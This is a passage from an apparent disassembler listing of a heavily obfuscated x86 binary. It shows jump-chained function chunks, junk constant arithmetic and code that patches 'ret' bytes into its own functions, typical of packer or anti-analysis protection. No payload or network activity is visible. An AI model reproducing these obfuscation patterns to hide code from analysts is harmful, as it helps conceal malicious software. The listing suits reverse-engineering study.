sub_44CF13	proc near		; CODE XREF: sub_419430+BBp
					; sub_44CF13+5j
					; DATA XREF: ...
		call	sub_44370F
		jmp	ds:off_41D200
sub_44CF13	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_44CF1E:				; CODE XREF: sub_446D8D-5F97j
		jmp	loc_4468F5
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_44CF23:				; CODE XREF: sub_441DDD+10j
		jl	loc_451A16
		pushf
		jp	loc_44DD76
		jmp	loc_451A0D
; END OF FUNCTION CHUNK	FOR sub_441DDD

; =============== S U B	R O U T	I N E =======================================



sub_44CF35	proc near		; DATA XREF: sub_4403D4+219Co
		imul	byte ptr [edx]
		call	sub_443452
sub_44CF35	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43ECAA

loc_44CF3C:				; CODE XREF: sub_43ECAA+2630j
		jz	loc_4539C5
		jmp	loc_43D161
; END OF FUNCTION CHUNK	FOR sub_43ECAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44CF47:				; CODE XREF: sub_43F227:loc_455D48j
		jz	loc_452179
		jmp	loc_4415B5
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_44CF52:				; CODE XREF: hvvrg7ie:loc_45A8A4j
		pop	edi
		or	edi, ds:4000F4h
		xor	edi, 0CC206CECh
		or	edi, 18E47D3Fh
		xor	edi, 2548416Eh
		jmp	loc_4398E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EED4

loc_44CF70:				; CODE XREF: sub_43EED4+17j
		mov	eax, [eax]
		add	eax, [ebp-4]
		add	eax, 18h
		jmp	loc_447391
; END OF FUNCTION CHUNK	FOR sub_43EED4

; =============== S U B	R O U T	I N E =======================================



sub_44CF7D	proc near		; CODE XREF: hvvrg7ie:loc_442042j
					; sub_445616+3j

; FUNCTION CHUNK AT 0043B339 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044FA5D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450611 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455948 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457850 SIZE 00000005 BYTES

		add	esp, 0FFFFFFE4h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		xor	eax, eax
		jmp	loc_44FA5D
sub_44CF7D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44CF8D:				; CODE XREF: sub_454099:loc_4427CEj
					; sub_44C6D7:loc_446FA1j
		test	eax, edx
		jmp	loc_43B1B0
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44CF94:				; CODE XREF: sub_442FD1+576Cj
		jz	loc_439780
; END OF FUNCTION CHUNK	FOR sub_442FD1
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_44CF9A:				; CODE XREF: sub_43E60A+12643j
		jmp	loc_4525EB
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_44CF9F:				; CODE XREF: sub_453405-15B9Fj
		jmp	loc_458CA8
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
		mov	ecx, 7B887250h
		and	edx, 5998FB31h
		add	ecx, ebp
		jmp	loc_439780
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_44CFB6:				; CODE XREF: sub_44BCAE+9CB5j
		xor	ebp, 0A38AD307h
		xor	ecx, eax
		cmp	ebp, ebx
		jmp	loc_440D58
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
		and	esi, 552C3468h
		jmp	sub_445F5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_44CFD0:				; CODE XREF: sub_448100+A839j
		mov	esi, [edi]
		rol	ecx, 11h
		and	esi, ecx
		jp	loc_44E617

loc_44CFDD:				; CODE XREF: sub_448100:loc_440AF4j
		mov	eax, [ebp-4]
		push	ecx
		push	0CC07B017h
		pop	ecx

loc_44CFE7:				; CODE XREF: hvvrg7ie:00439288j
		jmp	loc_439A01
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_44CFEC:				; CODE XREF: sub_448DE4+5D95j
		mov	edx, ebx

loc_44CFEE:				; CODE XREF: sub_448DE4:loc_445EDEj
		mov	eax, [ebp-10h]
		push	esi
		push	0D2E400ACh
		pop	esi
		and	esi, 0BC19BA6Fh
		or	esi, 0E10DC40Ch
		and	esi, 0FF660A3Eh
		jmp	loc_447F89
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_44D00F:				; CODE XREF: sub_458095:loc_444AB2j
		mov	byte ptr [eax],	0C3h
		jmp	loc_44FC9F
; END OF FUNCTION CHUNK	FOR sub_458095

; =============== S U B	R O U T	I N E =======================================



sub_44D017	proc near		; CODE XREF: sub_40B2BC+10Fp
					; sub_40B2BC+126p ...

; FUNCTION CHUNK AT 00442006 SIZE 00000005 BYTES

		push	offset sub_4514E0
		jmp	loc_442006
sub_44D017	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_44D021:				; CODE XREF: sub_450F97+66ADj
		jnz	loc_43D773
		jmp	loc_447FC8
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44905F

loc_44D02C:				; CODE XREF: sub_44905F+Bj
		pop	edi
		sub	edi, 1363F5F2h
		or	edi, 0B8EA066h
		add	edi, 70A43A5Fh
		xchg	edi, [esp+4+var_4]
		jmp	sub_449EB1
; END OF FUNCTION CHUNK	FOR sub_44905F
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_205. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44D04A:				; CODE XREF: hvvrg7ie:0045B9ABj
		jmp	loc_443E17
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FA76

loc_44D04F:				; CODE XREF: sub_44FA76+3j
		jmp	loc_45281D
; END OF FUNCTION CHUNK	FOR sub_44FA76
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44D054:				; CODE XREF: sub_43E128+3A9Bj
					; sub_43E128+DC50j
		jo	loc_448605
		push	offset sub_443375
		jmp	nullsub_208
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44D064:				; CODE XREF: sub_450246:loc_43C53Dj
		push	86B9C205h
		pop	ebx
		add	ebx, 0E4CE40AAh
		xor	ebx, 0BB335C9Dh
		add	ebx, ebp
		add	ebx, 2F44A1B2h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_44DF9B
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CCA

loc_44D086:				; CODE XREF: sub_448CCA+9j
		mov	edx, esi
		pop	esi
		push	offset loc_439328
		jmp	nullsub_100
; END OF FUNCTION CHUNK	FOR sub_448CCA
; ---------------------------------------------------------------------------
		mov	edx, 9E849D81h
		call	sub_446A16
		push	eax
		ror	eax, 6
		jmp	loc_445BA6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_44D0A6:				; CODE XREF: sub_45AB9D:loc_44CE02j
		jge	loc_445C75
		rol	edx, 17h
		xchg	ebp, [ebx]
		popf
		jmp	loc_445C6D
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_44D0B7:				; CODE XREF: sub_4414F6+12B73j
		jp	loc_455973
		cmp	ebp, ebx
		jmp	loc_44ABB2
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44D0C4:				; CODE XREF: sub_440643:loc_4529D0j
		jz	loc_4586E2
		shr	esi, 8
		add	eax, 69A67F55h
		jmp	loc_4586D4
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_44D0D8:				; CODE XREF: sub_451176:loc_442FEFj
		and	ecx, 0A95C4D69h
		jmp	loc_447A4B
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED23

loc_44D0E3:				; CODE XREF: sub_44ED23:loc_44C6ECj
					; hvvrg7ie:0044C713j
		rol	eax, 1
		cmp	eax, 0EB06D375h
		jmp	loc_451770
; END OF FUNCTION CHUNK	FOR sub_44ED23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_44D0F0:				; CODE XREF: sub_43E163+5j
		push	esi
		push	0DC5366FCh
		pop	esi

loc_44D0F7:				; CODE XREF: hvvrg7ie:0045B47Dj
		or	esi, 0FE6F6B5Eh
		jmp	loc_44447B
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_44D102:				; CODE XREF: sub_453405-D9AFj
		jz	loc_44FA3D
		jmp	loc_450253
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------

loc_44D10D:				; CODE XREF: hvvrg7ie:loc_44A019j
		pop	eax
		and	eax, 0E604F17Dh
		add	eax, 45A47B87h
		push	offset sub_446428
		jmp	locret_4529CF
; ---------------------------------------------------------------------------
		mov	ebx, [esi]
		jmp	loc_44E1C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_44D12B:				; CODE XREF: sub_452F78:loc_446766j
		shr	edx, 0Ch
		jmp	loc_43CC82
; END OF FUNCTION CHUNK	FOR sub_452F78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44D133:				; CODE XREF: sub_43D285:loc_44CC8Aj
		jnz	loc_44BCF0
		jmp	loc_447F46
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44D13E:				; CODE XREF: sub_450246-EDB2j
		jz	loc_441477
		jmp	loc_457D3D
; END OF FUNCTION CHUNK	FOR sub_450246

; =============== S U B	R O U T	I N E =======================================



sub_44D149	proc near		; DATA XREF: hvvrg7ie:00440D9Do

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004422F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444392 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00448C11 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044BA78 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004520BC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004520C7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452E63 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B4AC SIZE 0000000C BYTES

		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4520C7
		jmp	loc_44BA78
sub_44D149	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440059

loc_44D159:				; CODE XREF: sub_440059+11j
		mov	eax, [ebp-4]
		mov	esp, ebp

loc_44D15E:				; CODE XREF: sub_455087:loc_43B686j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_440059

; =============== S U B	R O U T	I N E =======================================



sub_44D160	proc near		; CODE XREF: sub_440059+Cp
					; sub_43BD8F+1C18Bj ...
		mov	dword ptr [eax], 0
		jmp	nullsub_101
sub_44D160	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44D16B:				; CODE XREF: sub_44616F+D955j
		jns	loc_44B1B4
; END OF FUNCTION CHUNK	FOR sub_44616F

; =============== S U B	R O U T	I N E =======================================



sub_44D171	proc near		; CODE XREF: sub_449D75+Ap
		xchg	edi, [esp+0]
		pop	edi
		add	eax, ebp
		add	eax, 0CA61CAA5h
		jmp	loc_455B97
sub_44D171	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:off_41D1F0, eax
		lea	eax, sub_443E56
		mov	byte ptr [eax],	0C3h
		jmp	loc_4454DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_44D196:				; CODE XREF: sub_443E56j
		xchg	ecx, [esp+0]
		mov	edx, ecx
		pop	ecx
		jmp	loc_458784
; END OF FUNCTION CHUNK	FOR sub_443E56
; ---------------------------------------------------------------------------

loc_44D1A1:				; CODE XREF: hvvrg7ie:loc_44792Aj
		mov	esi, edi
		or	ecx, 1D51461Ah
		jbe	loc_448C65
		adc	edi, 6F59BD3Bh
		jmp	loc_43DF0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_44D1BA:				; CODE XREF: sub_44107D+1j
		mov	ebp, esp
		push	ecx
		cmp	ds:dword_4510BC, 0
		jz	loc_45B14E
		mov	eax, ds:dword_4510BC
		jmp	loc_45B140
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442D68

loc_44D1D4:				; CODE XREF: sub_442D68:loc_446C72j
		add	ebx, 0F843855Eh
		rol	ebx, 9
		xor	ebx, 0F8AA98ECh
		add	ebx, 7C7540D8h
		push	offset sub_445DF4
		jmp	loc_445BD0
; END OF FUNCTION CHUNK	FOR sub_442D68
; ---------------------------------------------------------------------------
		mov	eax, 86480F55h
		call	sub_450C5A
		mov	ds:dword_41D0C4, eax
		lea	eax, nullsub_503
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_503
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		jmp	loc_43B01F
; ---------------------------------------------------------------------------
		or	edx, 2861A8B1h
		xchg	edi, eax
		jmp	sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446A16

loc_44D229:				; CODE XREF: sub_446A16+17j
		mov	[ebp+var_C], eax
		cmp	[ebp+var_4], 0
		jz	loc_440EF1
		call	nullsub_22
		jmp	loc_44283C
; END OF FUNCTION CHUNK	FOR sub_446A16

; =============== S U B	R O U T	I N E =======================================



sub_44D240	proc near		; CODE XREF: sub_446A16+3j

; FUNCTION CHUNK AT 0043C831 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D719 SIZE 00000015 BYTES

		add	esp, 0FFFFFED8h
		jmp	loc_43C831
sub_44D240	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_513. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A088

loc_44D24C:				; CODE XREF: sub_43A088+10D63j
		jmp	nullsub_102
; END OF FUNCTION CHUNK	FOR sub_43A088
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_44D251:				; CODE XREF: sub_43B7B9:loc_439370j
		xchg	edi, [esp+0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; ---------------------------------------------------------------------------
		not	ecx
		jmp	sub_43E75B
; ---------------------------------------------------------------------------

loc_44D260:				; DATA XREF: hvvrg7ie:004516C0o
		call	sub_450C5A
		call	sub_44B4CA
; START	OF FUNCTION CHUNK FOR sub_445408

loc_44D26A:				; CODE XREF: sub_445408+Dj
		jmp	nullsub_346
; END OF FUNCTION CHUNK	FOR sub_445408
; ---------------------------------------------------------------------------
		sub	ecx, 16445780h
		jmp	sub_4553DE
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esi
		call	sub_454D52
; START	OF FUNCTION CHUNK FOR sub_43D980

loc_44D282:				; CODE XREF: sub_43D980:loc_439C4Bj
		push	offset loc_4463DC
		jmp	sub_459838
; END OF FUNCTION CHUNK	FOR sub_43D980
; ---------------------------------------------------------------------------

loc_44D28C:				; CODE XREF: hvvrg7ie:00439441j
		rol	edi, 1Fh
		jmp	loc_43FAB5
; ---------------------------------------------------------------------------
		shr	ecx, 10h
; START	OF FUNCTION CHUNK FOR sub_455DA8

loc_44D297:				; CODE XREF: sub_455DA8:loc_44944Bj
		jmp	sub_45A6E4
; END OF FUNCTION CHUNK	FOR sub_455DA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_44D29C:				; CODE XREF: sub_44955C-AB40j
		mov	eax, [eax]
		call	sub_455B50
; END OF FUNCTION CHUNK	FOR sub_44955C
; START	OF FUNCTION CHUNK FOR sub_444315

loc_44D2A3:				; CODE XREF: sub_444315+4FCEj
		mov	[ecx], edx
		adc	edx, 254FF68Bh
		cmp	ebx, edi
		jmp	loc_4509A0
; END OF FUNCTION CHUNK	FOR sub_444315
; ---------------------------------------------------------------------------

loc_44D2B2:				; CODE XREF: hvvrg7ie:0043B03Ej
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_503
; ---------------------------------------------------------------------------
		push	esi
		push	3294B113h
		pop	esi
		jmp	loc_450F30

; =============== S U B	R O U T	I N E =======================================



sub_44D2C6	proc near		; CODE XREF: sub_43A319:loc_439BCDj
					; sub_449D38-F62Ap ...
		push	23C8DD82h
		pop	eax
		and	eax, 4F9DF1D2h
		rol	eax, 1Ch
		xor	eax, 9EC5C2C7h
		retn
sub_44D2C6	endp

; ---------------------------------------------------------------------------

loc_44D2DC:				; CODE XREF: hvvrg7ie:0045B11Dj
		jmp	sub_45046B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346F

loc_44D2E1:				; CODE XREF: sub_44346F+1180Aj
		jmp	loc_43BC12
; END OF FUNCTION CHUNK	FOR sub_44346F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405D7

loc_44D2E6:				; CODE XREF: sub_4405D7+5132j
		jmp	loc_439C09
; END OF FUNCTION CHUNK	FOR sub_4405D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_44D2EB:				; CODE XREF: sub_442334+2j
		call	sub_439549
		test	al, al
		jmp	loc_44D3F9
; END OF FUNCTION CHUNK	FOR sub_442334
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_354. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44D2F8	proc near		; CODE XREF: hvvrg7ie:0044926Ej
					; sub_44E3B3+Ap

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043907A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00439144 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004394EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004397A7 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00439FD7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043A340 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A598 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043BABB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BCB4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043BD80 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043C538 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D88A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E4D2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043E8BF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043FE51 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004410F0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004413D2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441955 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00441AF7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00442417 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442797 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004431FF SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00444A5A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444DED SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004450AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004452BE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00445AE0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044614A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044686D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004473AA SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004474D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447560 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00447D73 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448551 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004487DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004488B4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448A62 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044975D SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00449E63 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00449EAC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449FD9 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044A350 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A510 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B657 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BB8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BE52 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044C10C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044C1A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C470 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C762 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CB02 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D6A6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044DC2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E9EF SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044EB84 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F38B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F75F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FF5A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450A6B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450C93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045129B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045132B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451749 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451CA0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452834 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453B69 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453C7F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045457E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00454737 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454869 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455281 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004564CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045661D SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004575E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457880 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457D48 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458726 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004597D8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045AD99 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		cmp	dword ptr [ebp-4], 1
		jnz	loc_4452BE
		jmp	loc_4450AD
sub_44D2F8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D30B:				; CODE XREF: hvvrg7ie:004549DAj
		jnz	loc_448B12

loc_44D311:				; CODE XREF: hvvrg7ie:loc_442AF1j
		push	offset sub_447662
		jmp	loc_452879
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44980B

loc_44D31B:				; CODE XREF: sub_44980B-CC5Fj
		cmp	edx, eax
		jmp	loc_44E6F6
; END OF FUNCTION CHUNK	FOR sub_44980B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2CE

loc_44D322:				; CODE XREF: sub_45A2CE:loc_450177j
		add	eax, 0FC44C710h
		xchg	eax, [esp+4+var_4]
		jmp	loc_453328
; END OF FUNCTION CHUNK	FOR sub_45A2CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44D330:				; CODE XREF: sub_43E063-48C1j
		pop	edx
		pop	eax
		xchg	esi, [esp-0Ch+arg_8]
		mov	ebp, esi
		pop	esi
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ACF1

loc_44D33D:				; CODE XREF: sub_45ACF1:loc_4580E9j
		or	ebx, ecx
		shr	ebx, 15h
		call	sub_44457D

loc_44D347:				; CODE XREF: hvvrg7ie:0045AF31j
		jmp	loc_456A17
; END OF FUNCTION CHUNK	FOR sub_45ACF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455273

loc_44D34C:				; CODE XREF: sub_455273-16940j
		jmp	nullsub_204
; END OF FUNCTION CHUNK	FOR sub_455273
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B99

loc_44D351:				; CODE XREF: sub_446B99-16D8j
		shl	ebp, 8
		and	edi, ebx

loc_44D356:				; CODE XREF: sub_446B99:loc_4454B6j
		rol	edx, 5
		add	edx, 97D9CF3Fh
		xor	edx, 159D8ABDh
		xchg	edx, [esp+4+var_4]

loc_44D368:				; CODE XREF: hvvrg7ie:00455EF3j
		lea	eax, [ebp-806h]
		call	sub_451442
; END OF FUNCTION CHUNK	FOR sub_446B99
; START	OF FUNCTION CHUNK FOR sub_43AC3B

loc_44D373:				; CODE XREF: sub_43AC3B+12ED7j
		jmp	loc_449F3F
; END OF FUNCTION CHUNK	FOR sub_43AC3B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E62

loc_44D378:				; CODE XREF: sub_445E62+1ED5j
		jmp	loc_44CE29
; END OF FUNCTION CHUNK	FOR sub_445E62
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_44D37D:				; CODE XREF: sub_455ACA-F08Aj
		jmp	loc_442188
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_44D382:				; CODE XREF: sub_44E4A6-FF03j
		jmp	nullsub_9
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D4D2

loc_44D387:				; CODE XREF: sub_43D4D2+Ej
		jmp	loc_43B881
; END OF FUNCTION CHUNK	FOR sub_43D4D2
; ---------------------------------------------------------------------------

loc_44D38C:				; CODE XREF: hvvrg7ie:0043FC59j
					; hvvrg7ie:loc_4505E6j
		adc	esi, ebx
		adc	ecx, 0C0ED018h
		jmp	loc_440348
; ---------------------------------------------------------------------------

loc_44D399:				; CODE XREF: hvvrg7ie:00457527j
		jnb	loc_44B792
		and	eax, 0AA2E6908h

loc_44D3A5:				; CODE XREF: hvvrg7ie:0044C70Dj
		add	ebx, 54DD9967h
		mov	edx, 9F81BD93h
		push	8A2A845Dh
		jmp	loc_44B824
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_44D3BA:				; CODE XREF: sub_44955C-DB73j
					; sub_44955C+1B04j
		rol	eax, 0Ch
		add	eax, 7757A602h

loc_44D3C3:				; CODE XREF: hvvrg7ie:loc_4593F6j
		xchg	eax, [esp-4+arg_0]
		jmp	loc_43F93F
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_44D3CB:				; CODE XREF: sub_4465A6:loc_43C533j
		jl	loc_45B970

loc_44D3D1:				; CODE XREF: sub_44616F+1361Aj
		jmp	loc_445DE9
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_44D3D6:				; CODE XREF: sub_43FC15+184F5j
		jmp	loc_450E9A
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
		mov	ebx, edi
		jge	loc_442620
		jmp	loc_45B970

; =============== S U B	R O U T	I N E =======================================



sub_44D3E8	proc near		; CODE XREF: hvvrg7ie:0044A7ABj
					; sub_44E6A5:loc_44C427p

; FUNCTION CHUNK AT 0043E44D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00444B05 SIZE 00000005 BYTES
